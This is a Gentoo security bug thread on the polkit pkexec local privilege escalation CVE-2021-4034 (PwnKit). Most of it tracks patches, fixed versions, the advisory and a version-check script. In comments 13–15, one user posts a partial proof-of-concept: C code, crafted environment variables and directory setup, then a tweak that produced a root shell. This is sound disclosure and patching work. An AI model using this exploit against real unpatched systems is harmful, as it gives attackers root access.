
Bug 832057 (CVE-2021-4034)

Summary: <sys-auth/polkit-0.120-r2: Local privilege escalation (CVE-2021-4034)
Product: Gentoo Security
Reporter: Sam James <sam>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED
Severity: critical
CC: foufou33, freedesktop-bugs, mike, orzel
Priority: Normal
Keywords: PullRequest
Version: unspecified
Hardware: All
OS: Linux
URL: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
See Also: https://github.com/gentoo/gentoo/pull/23980
Whiteboard: A1 [glsa]
Package list:
Runtime testing required: ---
Bug Depends on: 832060, 832075
Bug Blocks:

Description Sam James archtester Gentoo Infrastructure gentoo-dev Security 2022-01-25 17:06:56 UTC
More information when disclosed.
Comment 1 Larry the Git Cow gentoo-dev 2022-01-25 17:26:02 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=d0e16d6fb24423388c5acd74e5f0b9856af08f08

commit d0e16d6fb24423388c5acd74e5f0b9856af08f08
Author:     Sam James <sam@gentoo.org>
AuthorDate: 2022-01-25 17:25:25 +0000
Commit:     Sam James <sam@gentoo.org>
CommitDate: 2022-01-25 17:25:54 +0000

    sys-auth/polkit: fix CVE-2021-4043
    
    Bug: https://bugs.gentoo.org/832057
    Signed-off-by: Sam James <sam@gentoo.org>

 .../polkit/files/polkit-0.120-CVE-2021-4043.patch  |  72 +++++++++++++
 sys-auth/polkit/polkit-0.120-r2.ebuild             | 120 +++++++++++++++++++++
 2 files changed, 192 insertions(+)
Comment 2 Larry the Git Cow gentoo-dev 2022-01-26 00:51:23 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=77e50819c7c7c22dee5ee6b2e7538b3cfff789af

commit 77e50819c7c7c22dee5ee6b2e7538b3cfff789af
Author:     Sam James <sam@gentoo.org>
AuthorDate: 2022-01-26 00:50:34 +0000
Commit:     Sam James <sam@gentoo.org>
CommitDate: 2022-01-26 00:51:00 +0000

    sys-auth/polkit: backport CVE-2021-3560, CVE-2021-4043 patches to 0.117
    
    Needed for non-Rust arches like sparc.
    
    (Most users are on 0.120 and already fixed in previous commits.)
    
    Bug: https://bugs.gentoo.org/794052
    Bug: https://bugs.gentoo.org/832057
    Signed-off-by: Sam James <sam@gentoo.org>

 .../polkit/files/polkit-0.117-CVE-2021-3560.patch  |  29 +++++
 sys-auth/polkit/polkit-0.117-r3.ebuild             | 136 +++++++++++++++++++++
 2 files changed, 165 insertions(+)
Comment 3 Gleb 2022-01-26 10:13:11 UTC
polkit-0.120-r2 is already stable, so how should users apply the fix? Portage doesn't offer anything to rebuild.

Should this be addressed by using glsa-check?
Comment 4 Gleb 2022-01-26 10:23:02 UTC
I missed the fact that 0.120-r2 went stable today with the fix and it was installed on my system. Sorry for the noise.
Comment 5 Thomas Capricelli 2022-01-26 17:35:58 UTC
I don't understand. How do I know if the polkit on my systems has the fix or not?

Which package versions are OK?
Comment 6 Nils Freydank 2022-01-26 18:40:17 UTC
(In reply to Thomas Capricelli from comment #5)
> I don't understand. How do I know if the polkit on my systems has the fix or
> not?
> 
> Which package versions are OK?

Hi Thomas, please refer to the title which says "<sys-auth/polkit-0.120-r2". This means that any version number of polkit with a version below 0.120-r2 is vulnerable and affected by the bug, not including 0.120-r2 itself (that would be <= instead). You can update polkit e.g. by running 'emerge --sync && emerge --ask --oneshot --verbose sys-auth/polkit'. For further questions please consult the wiki, the forum and/or any of the IRC channels.
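A version check for this advisory's affected range, added here as an example (it is not code from the bug thread or from Gentoo's own tooling): it compares installed sys-auth/polkit versions, read from the Portage VDB directory names, against the title's "<0.120-r2" bound, and treats 0.117-r3 as fixed because of the backport in comment 2. The version parser is a deliberate simplification (no _rc/_p suffixes), and the sample VDB entries are constructed.

```python
import re
from pathlib import Path

# Simplified Gentoo version grammar: dotted numbers plus optional -rN revision.
# Assumption: enough for every polkit version on this bug; suffixes are rejected.
_VER_RE = re.compile(r"^(?P<num>\d+(?:\.\d+)*)(?:-r(?P<rev>\d+))?$")
FIXED_BOUND = "0.120-r2"     # bug title: <sys-auth/polkit-0.120-r2 is affected
BACKPORT_FIXED = "0.117-r3"  # comment 2: fix backported to the 0.117 branch


def parse_version(ver: str):
    """Return a comparable (numbers, revision) tuple for a Gentoo version."""
    m = _VER_RE.match(ver)
    if not m:
        raise ValueError(f"unsupported version string: {ver!r}")
    return tuple(int(x) for x in m.group("num").split(".")), int(m.group("rev") or 0)


def polkit_is_fixed(ver: str) -> bool:
    """True if this polkit version carries the CVE-2021-4034 fix."""
    nums, rev = parse_version(ver)
    if (nums, rev) >= parse_version(FIXED_BOUND):
        return True
    # Only the 0.117 branch got a separate backport; 0.118/0.119 did not.
    bp_nums, bp_rev = parse_version(BACKPORT_FIXED)
    return nums == bp_nums and rev >= bp_rev


def polkit_versions_from_vdb(entries):
    """Extract polkit versions from VDB entry names such as 'polkit-0.120-r2'."""
    return [e[len("polkit-"):] for e in entries if e.startswith("polkit-")]


def installed_polkit_versions(vdb="/var/db/pkg/sys-auth"):
    """Read installed versions from the Portage VDB on a live Gentoo system."""
    p = Path(vdb)
    names = [d.name for d in p.iterdir() if d.is_dir()] if p.is_dir() else []
    return polkit_versions_from_vdb(names)


def assess(versions):
    """Map each version to 'fixed' or 'VULNERABLE'."""
    return {v: "fixed" if polkit_is_fixed(v) else "VULNERABLE" for v in versions}


if __name__ == "__main__":
    # Constructed VDB listing standing in for a real /var/db/pkg/sys-auth.
    sample = ["polkit-0.120-r1", "pambase-20220214", "polkit-0.117-r3"]
    for ver, state in assess(polkit_versions_from_vdb(sample)).items():
        print(f"sys-auth/polkit-{ver}: {state}")
```

On a real Gentoo system the supported check is glsa-check (mentioned in comment 3); this script only makes the version-range logic behind the bug title explicit.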
Comment 7 Thomas Capricelli 2022-01-27 00:39:24 UTC
(In reply to Nils Freydank from comment #6)
> For further questions
> please consult the wiki, the forum and/or any of the IRC channels.

Hi Nils. No further question, your answer was perfect. Thanks for clarifying.
Comment 8 Larry the Git Cow gentoo-dev 2022-01-27 05:34:31 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/data/glsa.git/commit/?id=3b7263dbbe36631a95b29efe1f17ce9dfb40cc90

commit 3b7263dbbe36631a95b29efe1f17ce9dfb40cc90
Author:     Sam James <sam@gentoo.org>
AuthorDate: 2022-01-27 05:33:39 +0000
Commit:     Sam James <sam@gentoo.org>
CommitDate: 2022-01-27 05:34:25 +0000

    [ GLSA 202201-01 ] Polkit: Local privilege escalation
    
    Bug: https://bugs.gentoo.org/832057
    Signed-off-by: Sam James <sam@gentoo.org>

 glsa-202201-01.xml | 43 +++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 43 insertions(+)
Comment 9 Larry the Git Cow gentoo-dev 2022-01-27 19:50:36 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=943593956c04c5c2b1f1c679d5b3f36428d1173a

commit 943593956c04c5c2b1f1c679d5b3f36428d1173a
Author:     Mathieu Tortuyaux <mtortuyaux@microsoft.com>
AuthorDate: 2022-01-27 09:31:48 +0000
Commit:     Sam James <sam@gentoo.org>
CommitDate: 2022-01-27 19:50:27 +0000

    sys-auth/polkit: fix CVE id
    
    Nit-pick to avoid confusion.
    
    Bug: https://bugs.gentoo.org/832057
    Package-Manager: Portage-3.0.28, Repoman-3.0.3
    Signed-off-by: Mathieu Tortuyaux <mtortuyaux@microsoft.com>
    Closes: https://github.com/gentoo/gentoo/pull/23980
    Signed-off-by: Sam James <sam@gentoo.org>

 ...olkit-0.120-CVE-2021-4043.patch => polkit-0.120-CVE-2021-4034.patch} | 0
 sys-auth/polkit/polkit-0.117-r3.ebuild                                  | 2 +-
 sys-auth/polkit/polkit-0.120-r2.ebuild                                  | 2 +-
 3 files changed, 2 insertions(+), 2 deletions(-)
Comment 10 foufou33 2022-01-28 03:46:49 UTC
stupid question, has anyone checked that the exploit actually works?

Asking b/c the same PoC code works on non-patched Debian/Red Hat (derivatives) but fails miserably with Gentoo (and maybe Arch), with sys-auth/polkit-0.120-r1.

Traced it to the getenv call that's supposed to get GCONV_PATH. It fails here (getenv.c):

85       if (name_start == ep_start && !strncmp (*ep + 2, name, len)
86           && (*ep)[len + 2] == '=')

*ep points to the original value (I called it gconv in my code), not the rewritten one (GCONV_PATH), which is strange as ep is initialised from __environ, and __environ[0] points to GCONV_PATH=./gconv
I'm really stumped.
Comment 11 Sam James archtester Gentoo Infrastructure gentoo-dev Security 2022-01-28 04:07:38 UTC
(In reply to foufou33 from comment #10)
> stupid question, has anyone checked that the exploit actually works?
> 

I think there's various PoCs floating around but not Qualys'.

> Asking b/c the same PoC code works on non-patched Debian/Red Hat
> (derivatives) but fails miserably with Gentoo (and maybe Arch), with
> sys-auth/polkit-0.120-r1.
> 
> Traced it to the getenv call that's supposed to get GCONV_PATH. It fails here
> (getenv.c):
> 
> 85       if (name_start == ep_start && !strncmp (*ep + 2, name, len)
> 86           && (*ep)[len + 2] == '=')
> 
> *ep points to the original value (I called it gconv in my code), not the
> rewritten one (GCONV_PATH), which is strange as ep is initialised from
> __environ, and __environ[0] points to GCONV_PATH=./gconv
> I'm really stumped.

I assume you're on a glibc system? I've not really poked at it (ajak@ has though and it worked for him on a Gentoo system, I believe) but it's an interesting question: I wonder if some settings can influence at least one of the exploits (not the vulnerability itself which ofc definitely exists.)
Comment 12 John Helmert III archtester Gentoo Infrastructure gentoo-dev Security 2022-01-28 04:44:11 UTC
I've not gotten one working, but I haven't poked with it outside of my own environment. For fun, I started working on an exploit after the vulnerability was public, but I came to the conclusion that for some reason my environment under Sway isn't affected. Just calling `pkexec` fails:

~ $ pkexec
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ====
Authentication is needed to run `/bin/bash' as the super user
Authenticating as: System user; root (root)
Password:
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ====
Error executing command as another user: Not authorized

This incident has been reported.

I'm not sure what this is about, but after discovering this I stopped working on it. I suspect it's more likely to be affected on GNOME or KDE.
Comment 13 foufou33 2022-01-28 18:00:40 UTC
(In reply to Sam James from comment #11)
> (In reply to foufou33 from comment #10)
> > stupid question, has anyone checked that the exploit actually works?
> > 
> 
> I think there's various PoCs floating around but not Qualys'.
> 
I wrote my own using their description

int main (int argc, char **argv) {
        char *envp[] = {"gconv","PATH=GCONV_PATH=.","CHARSET=DUMMY","SHELL=bash",0};
        char *const args[] = {0};
        //char exe[] = "./envp";
        char exe[] = "/usr/bin/pkexec";
        execve(exe, args,envp);
        return 0;
}
(mkdir  'GCONV_PATH=.' && touch 'GCONV_PATH=.'/gconv && mkdir gconv ...etc)

gconv dir contains 
> > Asking b/c the same PoC code works on non-patched Debian/Red Hat
> > (derivatives) but fails miserably with Gentoo (and maybe Arch), with
> > sys-auth/polkit-0.120-r1.
> > 
> > Traced it to the getenv call that's supposed to get GCONV_PATH. It fails here
> > (getenv.c):
> > 
> > 85       if (name_start == ep_start && !strncmp (*ep + 2, name, len)
> > 86           && (*ep)[len + 2] == '=')
> > 
> > *ep points to the original value (I called it gconv in my code), not the
> > rewritten one (GCONV_PATH), which is strange as ep is initialised from
> > __environ, and __environ[0] points to GCONV_PATH=./gconv
> > I'm really stumped.
> 
> I assume you're on a glibc system? I've not really poked at it (ajak@ has
> though and it worked for him on a Gentoo system, I believe) but it's an
> interesting question: I wonder if some settings can influence at least one
> of the exploits (not the vulnerability itself which ofc definitely exists.)
Comment 14 foufou33 2022-01-28 18:07:40 UTC
Sorry, hit the send button without realising it :-/


To continue:
The gconv dir contains gconv-modules and the .so it is supposed to load (its content is irrelevant, as it is supposed to do whatever we want).


> I assume you're on a glibc system? I've not really poked at it (ajak@ has
> though and it worked for him on a Gentoo system, I believe) but it's an
> interesting question: I wonder if some settings can influence at least one
> of the exploits (not the vulnerability itself which ofc definitely exists.)
Yes, glibc 2.34, and I have an old one still on 2.32; same result:


$ ./pwnkit
GLib: Cannot convert message: Could not open converter from “UTF-8” to “DUMMY”
The value for the SHELL variable was not found the /etc/shells file

This incident has been reported.


instead of a root shell. The reason, as I stated, is that the call to getenv("GCONV_PATH") returns NULL in spite of __environ[0] == "GCONV_PATH=./gconv".
Comment 15 foufou33 2022-01-28 18:33:11 UTC
Oh well, setting GIO_USE_VFS= seems to fix it:

./pwnkit.exe 
pwned
sh-5.1#

Stolen from here:
https://github.com/berdav/CVE-2021-4034/commit/c219bcab54ec532ab4ead63ecb311e9d16a367d0
Comment 16 Larry the Git Cow gentoo-dev 2022-02-05 20:46:41 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=c0502be50e13cb62efd5c5fbb3e2cac255490e15

commit c0502be50e13cb62efd5c5fbb3e2cac255490e15
Author:     Andreas Sturmlechner <asturm@gentoo.org>
AuthorDate: 2022-02-05 20:30:47 +0000
Commit:     Andreas Sturmlechner <asturm@gentoo.org>
CommitDate: 2022-02-05 20:40:48 +0000

    sys-auth/polkit: Cleanup vulnerable 0.117-r2, 0.119-r2 and 0.120-r1
    
    Bug: https://bugs.gentoo.org/832057
    Package-Manager: Portage-3.0.30, Repoman-3.0.3
    Signed-off-by: Andreas Sturmlechner <asturm@gentoo.org>

 sys-auth/polkit/Manifest               |   1 -
 sys-auth/polkit/polkit-0.117-r2.ebuild | 133 ---------------------------------
 sys-auth/polkit/polkit-0.119-r2.ebuild | 132 --------------------------------
 sys-auth/polkit/polkit-0.120-r1.ebuild | 119 -----------------------------
 4 files changed, 385 deletions(-)
Comment 17 Sam James archtester Gentoo Infrastructure gentoo-dev Security 2022-05-05 23:39:15 UTC
GLSA was done in https://security.gentoo.org/glsa/202201-01.